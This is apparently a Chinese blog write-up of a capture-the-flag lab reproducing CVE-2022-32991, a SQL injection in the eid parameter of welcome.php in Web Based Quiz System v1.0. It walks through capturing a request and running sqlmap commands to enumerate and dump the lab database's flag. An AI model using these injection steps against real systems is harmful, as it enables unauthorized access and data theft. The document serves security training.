CVE-2022-32991

已于 2023-06-06 17:00:52 修改
阅读量483 收藏 1
点赞数
分类专栏: 春秋云境 文章标签: 数据库 php 安全
于 2023-05-30 21:21:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/130957302
版权

文章目录

CVE-2022-32991

一、漏洞介绍

该CMS的welcome.php中存在SQL注入攻击。

Web Based Quiz System是一个应用软件。用于一个简单的在线基础的项目。

Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。

二、渗透步骤
1、打开网站
http://eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com/

在这里插入图片描述

2、打开注册页面
http://eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com/register.php

在这里插入图片描述

3、填写注册信息
用户名:kali
邮箱:123@qq.com
密码:123456
学院名称:kali

在这里插入图片描述

4、打开登录界面
http://eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com/login.php

在这里插入图片描述

5、登录账号

在这里插入图片描述

6、查看内容

在这里插入图片描述

7、点击任意一个

在这里插入图片描述

8、截取数据包
GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1
Host: eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1681027454; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1681028235; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=cc4b2bacb487f8c27cfd634e28143a1682b7c2c3; PHPSESSID=mo7cdaa5a4csrgtgfb1018tsr8
Upgrade-Insecure-Requests: 1

在这里插入图片描述

9、更改eid参数并保存至文档
GET /welcome.php?q=quiz&step=2&eid=*&n=1&t=34 HTTP/1.1
Host: eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1681027454; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1681028235; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=cc4b2bacb487f8c27cfd634e28143a1682b7c2c3; PHPSESSID=mo7cdaa5a4csrgtgfb1018tsr8
Upgrade-Insecure-Requests: 1

在这里插入图片描述

10、探测数据库
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt --dbs --batch

数据库名:ctf

在这里插入图片描述

11、探测数据表
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -D ctf --tables --batch

数据表名:flag

在这里插入图片描述

12、探测列名
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -D ctf -T flag --columns --batch

列名:flag

在这里插入图片描述

13、查看flag值
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -D ctf -T flag -C flag --dump --batch 

flag值:flag{448ae86b-de9e-4779-a12c-f71128c76feb}

在这里插入图片描述

liebe1*1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web Based Quiz System SQL注入漏洞复现(CVE-2022-32991
千寻的博客
11-25 1064
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
【春秋云境】CVE-2022-32991
m0_49025459的博客
03-21 238
接下来我们使用bp,抓到点击start的包,放到txt文件中,命名为1.txt。,发现基于 Web 的测验系统 v1.0 通过。然后到sqlmap里面使用命令爆破出我要的数据。包含一个 SQL 注入漏洞。随便注册个账号能登录就。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境:CVE-2022-32991
一只爱吃橙子的羊
11-29 930
Web Based Quiz System SQL注入漏洞:CVE-2022-32991
春秋云镜.com 免费空间系列(1) CVE-2022-32991
陈学卫的博客
07-27 500
今天看到一个很好的在线靶场平台地址春秋云镜.com,里边有很多的免费的cve漏洞,从今天起,将更新一个春秋云镜免费空间系列,一个一个攻克cve的漏洞自此,迈出了攻防小白的第一步。这个主要考用户的sqlmap的一些命令和用法,熟练掌握sqlmap是我们成长的第一步。
CVE-2022-32991 Web Based Quiz System SQL注入
qq_38733240的博客
11-19 672
在Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。受影响的是未知功能文件:welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入。
春秋云境:CVE-2022-32991(SQL注入)
m0_65712192的博客
04-12 1732
该CMS的welcome.php中存在SQL注入攻击。
sql注入漏洞(CVE-2022-32991
热门推荐
Battery的博客
09-10 12万+
CVE-2022-32991是Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。打开靶场环境,如下。
春秋云镜 CVE-2022-32991靶场
orchid_sea的博客
11-23 590
进入CMS靶场,进入后台发现使用的GET方式传输数据,尝试sqlmap测试注入点。
【春秋云境】CVE-2022-32991靶场WP
果粒程
11-25 528
【春秋云境】CVE-2022-32991靶场WP
【春秋云境】CVE-2022-32991靶场wp
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值